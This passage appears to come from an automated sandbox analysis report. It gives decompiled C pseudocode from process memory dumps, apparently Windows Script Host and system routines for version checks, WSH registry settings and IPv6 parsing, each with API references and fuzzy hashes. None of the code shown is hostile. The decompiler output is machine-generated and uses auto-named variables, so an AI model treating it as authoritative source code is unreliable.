                                                        						if(_v292.dwMajorVersion == 4 && (_v292.dwMinorVersion == 0 || _v292.dwMinorVersion == 0xa || _v292.dwMinorVersion == 0x5a)) {
                                                        							 *0xb974c8 = 1;
                                                        						}
                                                        						goto L23;
                                                        					}
                                                        					if(_t27 != 1) {
                                                        						goto L23;
                                                        					}
                                                        					if(_v292.dwMajorVersion != 5) {
                                                        						if(_v292.dwMajorVersion > 4) {
                                                        							 *0xb974c8 = 0x20;
                                                        							goto L23;
                                                        						}
                                                        						 *0xb974c8 = 2;
                                                        						goto L18;
                                                        					}
                                                        					_t30 = _v292.dwMinorVersion;
                                                        					if(_t30 == 0) {
                                                        						 *0xb974c8 = 4;
                                                        						goto L23;
                                                        					}
                                                        					_t31 = _t30 - 1;
                                                        					if(_t31 == 0) {
                                                        						if(_v16 >= 2) {
                                                        							 *0xb974c8 = 8;
                                                        						}
                                                        						L12:
                                                        						 *0xb974c8 =  *0xb974c8 | 0x00000004;
                                                        						goto L23;
                                                        					}
                                                        					if(_t31 == 1) {
                                                        						if(_v16 >= 1) {
                                                        							 *0xb974c8 = 0x10;
                                                        						}
                                                        						goto L12;
                                                        					}
                                                        					 *0xb974c8 = 0x14;
                                                        					goto L23;
                                                        				}
                                                        			}



















                                                        APIs
                                                        • memset.MSVCRT ref: 00B940B0
                                                        • GetVersionExW.KERNEL32(?,?,00000008,00B934B3), ref: 00B940CB
                                                        • GetVersionExW.KERNEL32(?,?,00000008,00B934B3), ref: 00B940E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Version$memset
                                                        • String ID: Z
                                                        • API String ID: 3607446104-1505515367
                                                        • Opcode ID: 14f66d7d20563e15f11874bad0c63b1e5729db16a0b84fb852fbf7cde234bf5a
                                                        • Instruction ID: 6dc74863cb488020848fe7632c55f5c5dcd1360a37a08cf5911468ea984750b2
                                                        • Opcode Fuzzy Hash: 14f66d7d20563e15f11874bad0c63b1e5729db16a0b84fb852fbf7cde234bf5a
                                                        • Instruction Fuzzy Hash: 74314B709242288ADF658B04ED49BE97EF8FB64304F1401EAC109A3352DB749AC68F96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B8F96C(void* __eax, void* __ebx, void* __ecx, void* __edx, char* _a4, intOrPtr _a8) {
                                                        				void* _v8;
                                                        				void* __edi;
                                                        				signed int _t13;
                                                        				signed int _t17;
                                                        				signed int _t19;
                                                        				void* _t23;
                                                        				void* _t27;
                                                        				void* _t29;
                                                        				signed int _t32;
                                                        
                                                        				_t27 = __edx;
                                                        				_t23 = __ebx;
                                                        				_t29 = __eax;
                                                        				_t32 = 0;
                                                        				_t13 = RegOpenKeyExA(0x80000000, _a4, 0, 0x2001f,  &_v8);
                                                        				if(_t13 != 0) {
                                                        					if(_a8 == 0) {
                                                        						if(_t13 > 0) {
                                                        							_t13 = _t13 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						_t32 = _t13;
                                                        					}
                                                        					L13:
                                                        					return _t32;
                                                        				}
                                                        				if(_a8 == 0) {
                                                        					_t17 = 1;
                                                        				} else {
                                                        					_t17 = 0 | E00B8F7CB(_v8, "ScriptEngine") >= 0x00000000;
                                                        				}
                                                        				if(_t17 != 0) {
                                                        					_t19 = E00B8F764(_v8, "Shell", 0xb89b44, _t29);
                                                        					_t32 = _t19;
                                                        					if(_t32 < 0 && (_t19 & 0x0000ffff) == 5) {
                                                        						_t32 = E00B8F8BF(_t23, _t27, _t29, _a4);
                                                        					}
                                                        				}
                                                        				RegCloseKey(_v8);
                                                        				goto L13;
                                                        			}













                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000000,?,00000000,0002001F,00000000), ref: 00B8F98A
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B8F9E8
                                                          • Part of subcall function 00B8F7CB: RegOpenKeyExA.ADVAPI32(?,00B8FB79,00000000,00020019,00B8FB79), ref: 00B8F7E2
                                                          • Part of subcall function 00B8F7CB: RegCloseKey.ADVAPI32(00B8FB79), ref: 00B8F7F1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseOpen
                                                        • String ID: ScriptEngine$Shell
                                                        • API String ID: 47109696-1851718235
                                                        • Opcode ID: 368c78571e7cfa15002d917f17e3df67d2f7af03e9864448124bc149d2c3930a
                                                        • Instruction ID: 697ba8aa9e9038a91ff7228b83220c4968b4dd37bb020a1b19f8c337c495567d
                                                        • Opcode Fuzzy Hash: 368c78571e7cfa15002d917f17e3df67d2f7af03e9864448124bc149d2c3930a
                                                        • Instruction Fuzzy Hash: 3901C432A00117FB9F217A65DC06ABA7AE9DF517A0B1541B5F805E2170EA70CD10E780
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 95%
                                                        			E00B83D3E(signed int __ecx, void* __eflags, void* _a4) {
                                                        				signed int _v8;
                                                        				void* _t16;
                                                        				signed int _t19;
                                                        				signed int _t26;
                                                        				void* _t28;
                                                        				void* _t30;
                                                        				signed int* _t33;
                                                        
                                                        				_t26 = __ecx;
                                                        				_push(__ecx);
                                                        				_t33 = __ecx;
                                                        				_t16 = E00B83B78(__ecx, _t28, _a4, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_a4);
                                                        				if(_t16 < 0) {
                                                        					L9:
                                                        					return _t16;
                                                        				}
                                                        				_t30 = E00B8413D(_t28, _a4, L"Timeout",  &_v8);
                                                        				if(_t30 >= 0) {
                                                        					_t19 = _v8;
                                                        					_t33[1] = _t26 & 0xffffff00 | _t19 != 0x00000000;
                                                        					 *_t33 = _t19;
                                                        					if(_t19 == 0) {
                                                        						L4:
                                                        						 *_t33 =  *_t33 & 0x00000000;
                                                        						L5:
                                                        						_t30 = E00B832BE(_t28, _a4, L"DisplayLogo",  &(_t33[1]));
                                                        						if(_t30 >= 0) {
                                                        							_t33[1] = 1;
                                                        						} else {
                                                        							if(_t30 == 0x80070002) {
                                                        								_t33[1] = 0;
                                                        								_t30 = 0;
                                                        							}
                                                        						}
                                                        						L8:
                                                        						RegCloseKey(_a4);
                                                        						_t16 = _t30;
                                                        						goto L9;
                                                        					}
                                                        					goto L5;
                                                        				}
                                                        				if(_t30 != 0x80070002) {
                                                        					goto L8;
                                                        				} else {
                                                        					_t33[1] = 0;
                                                        					goto L4;
                                                        				}
                                                        			}











                                                        APIs
                                                          • Part of subcall function 00B83B78: RegCreateKeyExW.ADVAPI32(00B82218,00B82238,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B83BAB
                                                          • Part of subcall function 00B8413D: RegQueryValueExW.ADVAPI32(00000004,00B82238,00000000,00B82218,00B82218,00000004), ref: 00B84179
                                                        • RegCloseKey.ADVAPI32(00B82218), ref: 00B83DB2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseCreateQueryValue
                                                        • String ID: DisplayLogo$Software\Microsoft\Windows Script Host\Settings$Timeout
                                                        • API String ID: 4083198587-512383463
                                                        • Opcode ID: 6e8715d29ce29f35a9974d213ec8560cf0b7b48647f9c790637d6c7b5daf6203
                                                        • Instruction ID: 127f096f2971dcec6b33d6991e72bc2998f66cc55b74ddfd2ff4aec7121d9842
                                                        • Opcode Fuzzy Hash: 6e8715d29ce29f35a9974d213ec8560cf0b7b48647f9c790637d6c7b5daf6203
                                                        • Instruction Fuzzy Hash: 72110276200645BBDB21BA18CC40BAA7ADDDFA0F54F1044B8F845C7271EA30DA41C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B8F066(intOrPtr* __ecx, void* __edx, void* __eflags, void* _a4) {
                                                        				void* _t9;
                                                        				intOrPtr _t10;
                                                        				void* _t19;
                                                        				intOrPtr* _t21;
                                                        
                                                        				_t17 = __edx;
                                                        				_t16 = __ecx;
                                                        				_t21 = __ecx;
                                                        				_t9 = E00B83B78(__ecx, __edx, _a4, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20006,  &_a4);
                                                        				if(_t9 >= 0) {
                                                        					if( *((char*)(__ecx + 4)) == 0) {
                                                        						_t10 = 0;
                                                        					} else {
                                                        						_t10 =  *__ecx;
                                                        					}
                                                        					_t19 = E00B93671(_t16, _t17, _a4, L"Timeout", _t10);
                                                        					if(_t19 >= 0) {
                                                        						_t19 = E00B93728(_a4, L"DisplayLogo",  *(_t21 + 6) & 0x000000ff);
                                                        					}
                                                        					RegCloseKey(_a4);
                                                        					return _t19;
                                                        				}
                                                        				return _t9;
                                                        			}








                                                        APIs
                                                          • Part of subcall function 00B83B78: RegCreateKeyExW.ADVAPI32(00B82218,00B82238,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B83BAB
                                                        • RegCloseKey.ADVAPI32(00B82218), ref: 00B8F0C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseCreate
                                                        • String ID: DisplayLogo$Software\Microsoft\Windows Script Host\Settings$Timeout
                                                        • API String ID: 2932200918-512383463
                                                        • Opcode ID: 8f0553595ae668aa8a13f2153f4b967609402970aeb97e4dee9e03e5c4279883
                                                        • Instruction ID: f9d5c4e7152499647f90bbddf7c3a0dfb1150e0c9c3b45f521d635abb4a8ee56
                                                        • Opcode Fuzzy Hash: 8f0553595ae668aa8a13f2153f4b967609402970aeb97e4dee9e03e5c4279883
                                                        • Instruction Fuzzy Hash: BDF06D762002557EDB113E69DC01DBABAEADB81F90B0444B5BD45C6271EA71CE51C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 87%
                                                        			E00B8FBD9(struct HWND__* _a4) {
                                                        				signed int _v8;
                                                        				char _v13;
                                                        				char _v14;
                                                        				char _v15;
                                                        				char _v16;
                                                        				signed int _t12;
                                                        				void* _t16;
                                                        				void* _t19;
                                                        				void* _t23;
                                                        				void* _t24;
                                                        				void* _t25;
                                                        				signed int _t26;
                                                        
                                                        				_t12 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t12 ^ _t26;
                                                        				if(GetClassNameA(_a4,  &_v16, 5) != 3 || _v13 != 0 || _v16 != 0x49 && _v16 != 0x69 || _v15 != 0x4d && _v15 != 0x6d || _v14 != 0x45 && _v14 != 0x65) {
                                                        					_t16 = 0;
                                                        				} else {
                                                        					_t16 = 1;
                                                        				}
                                                        				return E00B81335(_t16, _t19, _v8 ^ _t26, _t23, _t24, _t25);
                                                        			}
















                                                        APIs
                                                        • GetClassNameA.USER32(?,?,00000005), ref: 00B8FBF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ClassName
                                                        • String ID: e$i$m
                                                        • API String ID: 1191326365-1028471717
                                                        • Opcode ID: ddf63a0e8c5e757da91ff11c214d9a52d10733a8507c861fa3f0af908185705d
                                                        • Instruction ID: ac0e4e597235632a9ce5f21221abc896b7c2fa0ab99aceecdd3cdb655d139c0c
                                                        • Opcode Fuzzy Hash: ddf63a0e8c5e757da91ff11c214d9a52d10733a8507c861fa3f0af908185705d
                                                        • Instruction Fuzzy Hash: 590181B0E041CE7EEF20E7B888087BDBFE5CB15314F0488EAD945920A5DA785B94CB09
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0230FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _t105;
                                                        				void* _t110;
                                                        				char _t114;
                                                        				short _t115;
                                                        				void* _t118;
                                                        				signed short* _t119;
                                                        				short _t120;
                                                        				char _t122;
                                                        				void* _t127;
                                                        				void* _t130;
                                                        				signed int _t136;
                                                        				intOrPtr _t143;
                                                        				signed int _t158;
                                                        				signed short* _t164;
                                                        				signed int _t167;
                                                        				void* _t170;
                                                        
                                                        				_t158 = 0;
                                                        				_t164 = _a4;
                                                        				_v20 = 0;
                                                        				_v24 = 0;
                                                        				_v8 = 0;
                                                        				_v12 = 0;
                                                        				_v16 = 0;
                                                        				_v28 = 0;
                                                        				_t136 = 0;
                                                        				while(1) {
                                                        					_t167 =  *_t164 & 0x0000ffff;
                                                        					if(_t167 == _t158) {
                                                        						break;
                                                        					}
                                                        					_t118 = _v20 - _t158;
                                                        					if(_t118 == 0) {
                                                        						if(_t167 == 0x3a) {
                                                        							if(_v12 > _t158 || _v8 > _t158) {
                                                        								break;
                                                        							} else {
                                                        								_t119 =  &(_t164[1]);
                                                        								if( *_t119 != _t167) {
                                                        									break;
                                                        								}
                                                        								_t143 = 2;
                                                        								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                        								_v28 = 1;
                                                        								_v8 = _t143;
                                                        								_t136 = _t136 + 1;
                                                        								L47:
                                                        								_t164 = _t119;
                                                        								_v20 = _t143;
                                                        								L14:
                                                        								if(_v24 == _t158) {
                                                        									L19:
                                                        									_t164 =  &(_t164[1]);
                                                        									_t158 = 0;
                                                        									continue;
                                                        								}
                                                        								if(_v12 == _t158) {
                                                        									if(_v16 > 4) {
                                                        										L29:
                                                        										return 0xc000000d;
                                                        									}
                                                        									_t120 = E0230EE02(_v24, _t158, 0x10);
                                                        									_t170 = _t170 + 0xc;
                                                        									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                        									_t136 = _t136 + 1;
                                                        									goto L19;
                                                        								}
                                                        								if(_v16 > 3) {
                                                        									goto L29;
                                                        								}
                                                        								_t122 = E0230EE02(_v24, _t158, 0xa);
                                                        								_t170 = _t170 + 0xc;
                                                        								if(_t122 > 0xff) {
                                                        									goto L29;
                                                        								}
                                                        								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                        								goto L19;
                                                        							}
                                                        						}
                                                        						L21:
                                                        						if(_v8 > 7 || _t167 >= 0x80) {
                                                        							break;
                                                        						} else {
                                                        							if(E0230685D(_t167, 4) == 0) {
                                                        								if(E0230685D(_t167, 0x80) != 0) {
                                                        									if(_v12 > 0) {
                                                        										break;
                                                        									}
                                                        									_t127 = 1;
                                                        									_a7 = 1;
                                                        									_v24 = _t164;
                                                        									_v20 = 1;
                                                        									_v16 = 1;
                                                        									L36:
                                                        									if(_v20 == _t127) {
                                                        										goto L19;
                                                        									}
                                                        									_t158 = 0;
                                                        									goto L14;
                                                        								}
                                                        								break;
                                                        							}
                                                        							_a7 = 0;
                                                        							_v24 = _t164;
                                                        							_v20 = 1;
                                                        							_v16 = 1;
                                                        							goto L19;
                                                        						}
                                                        					}
                                                        					_t130 = _t118 - 1;
                                                        					if(_t130 != 0) {
                                                        						if(_t130 == 1) {
                                                        							goto L21;
                                                        						}
                                                        						_t127 = 1;
                                                        						goto L36;
                                                        					}
                                                        					if(_t167 >= 0x80) {
                                                        						L7:
                                                        						if(_t167 == 0x3a) {
                                                        							_t158 = 0;
                                                        							if(_v12 > 0 || _v8 > 6) {
                                                        								break;
                                                        							} else {
                                                        								_t119 =  &(_t164[1]);
                                                        								if( *_t119 != _t167) {
                                                        									_v8 = _v8 + 1;
                                                        									L13:
                                                        									_v20 = _t158;
                                                        									goto L14;
                                                        								}
                                                        								if(_v28 != 0) {
                                                        									break;
                                                        								}
                                                        								_v28 = _v8 + 1;
                                                        								_t143 = 2;
                                                        								_v8 = _v8 + _t143;
                                                        								goto L47;
                                                        							}
                                                        						}
                                                        						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                        							break;
                                                        						} else {
                                                        							_v12 = _v12 + 1;
                                                        							_t158 = 0;
                                                        							goto L13;
                                                        						}
                                                        					}
                                                        					if(E0230685D(_t167, 4) != 0) {
                                                        						_v16 = _v16 + 1;
                                                        						goto L19;
                                                        					}
                                                        					if(E0230685D(_t167, 0x80) != 0) {
                                                        						_v16 = _v16 + 1;
                                                        						if(_v12 > 0) {
                                                        							break;
                                                        						}
                                                        						_a7 = 1;
                                                        						goto L19;
                                                        					}
                                                        					goto L7;
                                                        				}
                                                        				 *_a8 = _t164;
                                                        				if(_v12 != 0) {
                                                        					if(_v12 != 3) {
                                                        						goto L29;
                                                        					}
                                                        					_v8 = _v8 + 1;
                                                        				}
                                                        				if(_v28 != 0 || _v8 == 7) {
                                                        					if(_v20 != 1) {
                                                        						if(_v20 != 2) {
                                                        							goto L29;
                                                        						}
                                                        						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                        						L65:
                                                        						_t105 = _v28;
                                                        						if(_t105 != 0) {
                                                        							_t98 = (_t105 - _v8) * 2; // 0x11
                                                        							E022E8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                        							_t110 = 8;
                                                        							E022DDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                        						}
                                                        						return 0;
                                                        					}
                                                        					if(_v12 != 0) {
                                                        						if(_v16 > 3) {
                                                        							goto L29;
                                                        						}
                                                        						_t114 = E0230EE02(_v24, 0, 0xa);
                                                        						_t170 = _t170 + 0xc;
                                                        						if(_t114 > 0xff) {
                                                        							goto L29;
                                                        						}
                                                        						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                        						goto L65;
                                                        					}
                                                        					if(_v16 > 4) {
                                                        						goto L29;
                                                        					}
                                                        					_t115 = E0230EE02(_v24, 0, 0x10);
                                                        					_t170 = _t170 + 0xc;
                                                        					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                        					goto L65;
                                                        				} else {
                                                        					goto L29;
                                                        				}
                                                        			}

























                                                        0x0231a3ad
                                                        0x00000000
                                                        0x00000000
                                                        0x0231a3b3
                                                        0x0231a3b3
                                                        0x0230fe1f
                                                        0x0233ed25
                                                        0x0233ed86
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ed91
                                                        0x0233ed95
                                                        0x0233ed95
                                                        0x0233ed9a
                                                        0x0233edad
                                                        0x0233edb3
                                                        0x0233edba
                                                        0x0233edc4
                                                        0x0233edc9
                                                        0x00000000
                                                        0x0233edcc
                                                        0x0233ed2a
                                                        0x0233ed55
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ed61
                                                        0x0233ed66
                                                        0x0233ed6e
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ed7d
                                                        0x00000000
                                                        0x0233ed7d
                                                        0x0233ed30
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ed3c
                                                        0x0233ed43
                                                        0x0233ed4b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID:
                                                        • API String ID: 3965848254-0
                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction ID: d952ac134e281d1fd2f6b5d650f5676bd4eb65147416502e498443aeb3f5adc3
                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction Fuzzy Hash: 14919E31D0020AEFDF35CF98C8957AEB7B4FF45709F20846AD415A6592EB308B81CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E00B83DCC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                        				signed int _v8;
                                                        				char _v528;
                                                        				void* _v532;
                                                        				void* _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr* _v544;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t33;
                                                        				intOrPtr* _t36;
                                                        				intOrPtr* _t37;
                                                        				intOrPtr* _t38;
                                                        				intOrPtr _t45;
                                                        				intOrPtr _t49;
                                                        				intOrPtr _t50;
                                                        				char* _t53;
                                                        				char* _t54;
                                                        				char* _t56;
                                                        				char* _t57;
                                                        				intOrPtr* _t58;
                                                        				char* _t59;
                                                        				intOrPtr* _t62;
                                                        				intOrPtr _t73;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t76;
                                                        				intOrPtr* _t77;
                                                        				signed int _t78;
                                                        
                                                        				_t72 = __edx;
                                                        				_t33 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t33 ^ _t78;
                                                        				_t73 = _a4;
                                                        				_v540 = _a12;
                                                        				_t36 = _a16;
                                                        				_t62 = 0;
                                                        				_push(0x44);
                                                        				_v544 = _t36;
                                                        				_v536 = 0;
                                                        				_v532 = 0;
                                                        				L00B82877();
                                                        				if(_t36 == 0) {
                                                        					_t77 = 0;
                                                        				} else {
                                                        					_t77 = E00B848AC(_t36, 0);
                                                        				}
                                                        				if(_t77 == _t62) {
                                                        					L19:
                                                        					_t74 = 0x8007000e;
                                                        					goto L12;
                                                        				} else {
                                                        					_t62 = _t73 + 0x2c;
                                                        					 *((intOrPtr*)(_t77 + 0x40)) = _t73;
                                                        					_t75 = __imp__#2;
                                                        					_t45 =  *_t75(_t62);
                                                        					 *((intOrPtr*)(_t77 + 0x28)) = _t45;
                                                        					if(_t45 == 0) {
                                                        						goto L19;
                                                        					}
                                                        					E00B83BEA(_t62,  &_v528, 0x104);
                                                        					_t49 =  *_t75( &_v528);
                                                        					 *((intOrPtr*)(_t77 + 0x2c)) = _t49;
                                                        					if(_t49 == 0) {
                                                        						goto L19;
                                                        					}
                                                        					_t50 =  *0xb9702c; // 0x0
                                                        					_t15 = _t77 + 0x24; // 0x24
                                                        					_t76 = _t15;
                                                        					E00B83A91(_t72, _t76, _t50 + 1);
                                                        					if( *_t76 == 0) {
                                                        						goto L19;
                                                        					}
                                                        					_t53 =  &_v536;
                                                        					__imp__#161(_t62, _t53);
                                                        					_t74 = _t53;
                                                        					if(_t53 >= 0) {
                                                        						_t18 = _t77 + 8; // 0x8
                                                        						_t54 = E00B83F8A(_t18, _v536);
                                                        						_t74 = _t54;
                                                        						if(_t54 >= 0) {
                                                        							_t56 = E00B84689( &_v532, _t62, _a8, _v540,  &_v532);
                                                        							_t74 = _t56;
                                                        							if(_t56 >= 0) {
                                                        								_t57 = E00B83F49(_v532, _v536);
                                                        								_t74 = _t57;
                                                        								if(_t57 >= 0) {
                                                        									_t58 = _v532;
                                                        									_t25 = _t77 + 0x30; // 0x30
                                                        									_t72 = _t25;
                                                        									_t59 =  *((intOrPtr*)( *_t58))(_t58, 0xb829e8, _t25);
                                                        									_t74 = _t59;
                                                        									if(_t59 >= 0) {
                                                        										 *_v544 = _t77;
                                                        										_t77 = 0;
                                                        										_t74 = 0;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					L12:
                                                        					_t37 = _v536;
                                                        					if(_t37 != 0) {
                                                        						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                        					}
                                                        					_t38 = _v532;
                                                        					if(_t38 != 0) {
                                                        						 *((intOrPtr*)( *_t38 + 8))(_t38);
                                                        					}
                                                        					if(_t77 != 0) {
                                                        						 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                        					}
                                                        					return E00B81335(_t74, _t62, _v8 ^ _t78, _t72, _t74, _t77);
                                                        				}
                                                        			}

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B83E09
                                                        • SysAllocString.OLEAUT32(?), ref: 00B83E36
                                                          • Part of subcall function 00B83BEA: memcpy.MSVCRT ref: 00B83C49
                                                        • SysAllocString.OLEAUT32(?), ref: 00B83E5C
                                                          • Part of subcall function 00B83A91: LoadStringW.USER32(?,?,00000800,?), ref: 00B83ADB
                                                          • Part of subcall function 00B83A91: SysAllocString.OLEAUT32(?), ref: 00B83AF2
                                                        • LoadTypeLib.OLEAUT32(?,?), ref: 00B83E8A
                                                          • Part of subcall function 00B84689: ??2@YAPAXI@Z.MSVCRT ref: 00B84695
                                                          • Part of subcall function 00B84689: SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B846C6
                                                          • Part of subcall function 00B84689: SysAllocString.OLEAUT32(?), ref: 00B846F0
                                                          • Part of subcall function 00B84689: SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 00B84708
                                                          • Part of subcall function 00B84689: VariantClear.OLEAUT32(?), ref: 00B84714
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$Alloc$??2@ArrayLoadSafe$ClearCreateElementTypeVariantmemcpy
                                                        • String ID:
                                                        • API String ID: 2003164717-0
                                                        • Opcode ID: b9d864dd7b56d1af16b766d1a69ad90d13ca266936d91fc5f6113dcb82e17f3b
                                                        • Instruction ID: 98b65e8fdbdc0a3908eabf93684970c25cecff5e7839d0c81c825b614b4ff18b
                                                        • Opcode Fuzzy Hash: b9d864dd7b56d1af16b766d1a69ad90d13ca266936d91fc5f6113dcb82e17f3b
                                                        • Instruction Fuzzy Hash: 4641837594021A9BCB21EF68CC84A9AB7F9EF94B00F1508E9E549D7221DF70DE41CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 55%
                                                        			E00B8F55F(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                        				void* _v8;
                                                        				void* _v12;
                                                        				char _v16;
                                                        				char _v20;
                                                        				char _v24;
                                                        				char* _t36;
                                                        				intOrPtr* _t37;
                                                        				intOrPtr* _t38;
                                                        				intOrPtr* _t44;
                                                        				intOrPtr* _t46;
                                                        				intOrPtr* _t54;
                                                        				intOrPtr* _t56;
                                                        				intOrPtr* _t58;
                                                        				intOrPtr* _t60;
                                                        				char* _t61;
                                                        				intOrPtr* _t73;
                                                        				char* _t74;
                                                        
                                                        				_t36 =  &_v8;
                                                        				_v12 = 0;
                                                        				_v8 = 0;
                                                        				_v16 = 0;
                                                        				_v20 = 0;
                                                        				__imp__#202(_t36);
                                                        				_t74 = _t36;
                                                        				if(_t74 >= 0) {
                                                        					_t44 = _v8;
                                                        					_t74 =  *((intOrPtr*)( *_t44 + 0xc))(_t44, _a4);
                                                        					if(_t74 >= 0) {
                                                        						_t46 = _v8;
                                                        						_t74 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, _a8);
                                                        						if(_t74 >= 0) {
                                                        							if(E00B83A91(__edx,  &_v16, _a12) != 0) {
                                                        								_v24 =  &_a16;
                                                        								_t74 = E00B82CB9(__edx, _v16,  &_v20,  &_v24);
                                                        								_v24 = 0;
                                                        								if(_t74 >= 0) {
                                                        									_t54 = _v8;
                                                        									_t74 =  *((intOrPtr*)( *_t54 + 0x14))(_t54, _v20);
                                                        									if(_t74 >= 0) {
                                                        										_t56 = _v8;
                                                        										_t74 =  *((intOrPtr*)( *_t56 + 0x18))(_t56, 0);
                                                        										if(_t74 >= 0) {
                                                        											_t58 = _v8;
                                                        											_t74 =  *((intOrPtr*)( *_t58 + 0x1c))(_t58, 0);
                                                        											if(_t74 >= 0) {
                                                        												_t60 = _v8;
                                                        												_t61 =  *((intOrPtr*)( *_t60))(_t60, 0xb89c18,  &_v12);
                                                        												_t74 = _t61;
                                                        												if(_t74 >= 0) {
                                                        													__imp__#201(0, _v12);
                                                        													_t74 = _t61;
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							} else {
                                                        								_t74 = 0x8007000e;
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				_t37 = _v8;
                                                        				if(_t37 != 0) {
                                                        					 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                        				}
                                                        				_t38 = _v12;
                                                        				if(_t38 != 0) {
                                                        					 *((intOrPtr*)( *_t38 + 8))(_t38);
                                                        				}
                                                        				_t73 = __imp__#6;
                                                        				 *_t73(_v16);
                                                        				 *_t73(_v20);
                                                        				return _t74;
                                                        			}

                                                        APIs
                                                        • CreateErrorInfo.OLEAUT32(?,?,00000000,?,?), ref: 00B8F57B
                                                        • SetErrorInfo.OLEAUT32(00000000,?), ref: 00B8F63A
                                                        • SysFreeString.OLEAUT32(?), ref: 00B8F665
                                                        • SysFreeString.OLEAUT32(?), ref: 00B8F66A
                                                          • Part of subcall function 00B83A91: LoadStringW.USER32(?,?,00000800,?), ref: 00B83ADB
                                                          • Part of subcall function 00B83A91: SysAllocString.OLEAUT32(?), ref: 00B83AF2
                                                        Memory Dump Source
